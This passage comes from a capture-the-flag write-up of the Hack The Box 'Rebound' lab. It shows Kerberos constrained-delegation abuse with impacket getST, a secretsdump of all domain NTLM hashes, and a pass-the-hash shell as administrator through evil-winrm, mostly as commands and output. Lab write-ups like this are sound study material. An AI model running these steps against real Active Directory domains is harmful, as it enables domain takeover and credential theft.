[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
This saves a ST / TGS ticket as the DC computer account for delegator$ into a file, and this time it is forwardable:
impacket-describeTicket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Number of credentials in cache: 1 [*] Parsing credential[0]: [*] Ticket Session Key : 4ed4e05588d7c81e2042a0859d466d6c [*] User Name : DC01$ [*] User Realm : rebound.htb [*] Service Name : browser/dc01.rebound.htb [*] Service Realm : REBOUND.HTB [*] Start Time : 06/12/2024 21:27:01 PM [*] End Time : 07/12/2024 07:27:01 AM [*] RenewTill : 07/12/2024 21:27:01 PM [*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep [*] KeyType : rc4_hmac [*] Base64(key) : TtTgVYjXyB4gQqCFnUZtbA== [*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$1ca3e095d3f03a1f7f1f6c4a$d5276aeba06f5e8d7139255a1fe494dfb07f61295d991bf13146ce08129e1afefafca97d4f87230b42924d25e9b33627a838fc8f80cb5649a64aba802eddf3ea4ce49c673dab2d201150b75829bb83308ff4927f84106a5d027d30145d93ad2aa06c625d82f2e72175c3e95c77f0145b96df76a0bb643e0d496e31969789ffd6937d9c83f6d0eb823cc2c37b632369d639792d96e50e27d35477cfd7deaa61dd361c21f2488830f6c7f7b04b10e5effcf2282cb4fc69fcc5b61ea3c3f4e13a1b5bc9674e29be25b425fd7728cb1b1737a37750567084427f60c585da3de237bdbfb8e0567f64897b7e79e0c8efda6654957eaa4923d5254199c6134a275ae765d92e29107e784f2aa1c28b706e714cfa89fc9442790c2745d22a751b60793de260b4348a81f21b4a2035990037a8fdf8f5e924efd876209fb6fc58c74c51c9454e853b6f2f890745445cbd0629b8d51925724e5b3b3f38321b8bccd5a6bab418f56f5c9384954614681dcea93c68815101158b1e6056f9d741923f45ada83647d9435a8a0a9cff68e2bdb7d9d377b80b7e01a6ca8c73d809652bd64a716a2df1e175f8b02153d06694e506829c69d71f3b2cd533918da77578c817eeb98f6d0bbba3557c992706bd28c84ed617fd2a0fc3b42882ddf1faeede95b188771dbc79e5491987de09287e497ccd6047a062104897d2718d0a0d370f0c9ece9e10069977890bd141727d24dadc1559d4036be90e09e892246154600186bdb3a3f29f9a2433028daf6e81bd62c6531c30ecfa156726254c06c59be7eecc59bcb0f63a083d84a43ab47f8452f9e7354bc4f9611a8620290e0ba53f0ed34adc67b1f4d2338ed6f75f0a76b44d6fc59202dc09dde7088cc9f1575c0e6abaf75568a26e798d5c8ec8fe0c1b6cfa67c94a912fd09d57610da2aba549aab2dfd327cf847d12a27b79b4efb6476f8d3be19a38d8de84d755bea3b64c67d64a5a7adaf8f51e46110495f6242a43c81596e4f80ae3cfb9c9c88f19dd2064312dd2faee1ea32198abeb34d2f5f25a9be2b5f0c351074d9cb66b50317a9a338456163867300c02c6abe67a3e51c65519334a8389bc1731ed0ea1fda35716064dc683f2bd49697c6827049902f8821c7f630e95fafcdbb520a55233d1707270408f1b044ca7129efa6df42237173859132b7cbedd0ef83d63f3ad960517258bf147f0dd81795566665e3f5beb94f872ddba07e978a32de795679f22fb1a3d478110f2682b41d6423cd423b2978361417ccae95b1249945e43203ad5cb76f0d44be381696853bec3725278e9b915a920e0c9f872979e7d62d6454b7ee4daf445980e16849092c58b9eac7b698853266f2d7c1f17375b158f76212b4e81cbab55709a007c3d841d2df3b33f606bd151ff5df56a1d5faaba658fb64974ecc4e1003b76d96a42b83b31d0ce7e90ebf4bd5954f70fe07f41618410fff34c05d998b4a6e6f4eabd7cd61bbf8790d4840bb3ef5253ff5aea078bf5a57a86d2c1c6e32728c393ef7ee7e038be7e9c5df20c837fe5634c2ffe3e88846f7a32d78dc3f36fbbddd03e486c5d25506c2bca305b060baddbe62a2561547c984e5ee06853fde55928cbca8656ba5856545b89bd2b6f57cb6315e169a26bada34a399fd311e3279eac785d849ed273f8386a47d9d4c1e68cb8744884314229bc13ef2e87dafa3d6d47d534d66e2ff9df53990c9f526f0935e8e6f0338e932e41aa6e5edb99e3403894d679434e7bd74b266c09d806f104ab42188c2f568407b549522e345861df77f6dc4f5691aa4f5c2f14 [*] Decoding unencrypted data in credential[0]['ticket']: [*] Service Name : browser/dc01.rebound.htb [*] Service Realm : REBOUND.HTB [*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18) [-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
.
This is what was missing above.
Another Shot At Constrained Delegation
Create ST / TGS Ticket
Now that I have a ST / TGS ticket as DC01$ for delegator$, delegator$ can use that along with the constrained delegation to get a ST on DC01 as DC01.
impacket-getST -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating DC01$ [*] Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self [*] Requesting S4U2Proxy [*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
.
Dump Hashes
With this ticket as the machine account, I can dump hashes from the DC. The KRB5CCNAME environment variable will point to the ticket, and then the -k and -no-pass options will tell secretsdump.py to use it:
┌──(puck㉿kali)-[~/htb/rebound]
└─$ export KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache'
klist
Ticket cache: FILE:DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@rebound.htb
Valid starting Expires Service principal
12/06/2024 21:34:42 12/07/2024 07:34:42 http/dc01.rebound.htb@REBOUND.HTB
renew until 12/07/2024 21:34:42
impacket-secretsdump -no-pass -k dc01.rebound.htb -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b:::
[*] Cleaning up...
Shell
With the admin hash, I can pass that to Evil-WinRM to get a shell:
└─$ evil-winrm -i rebound.htb -u administrator -H 176be138594933bb67db3b2572fc91b8
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
That was a lot of hard work!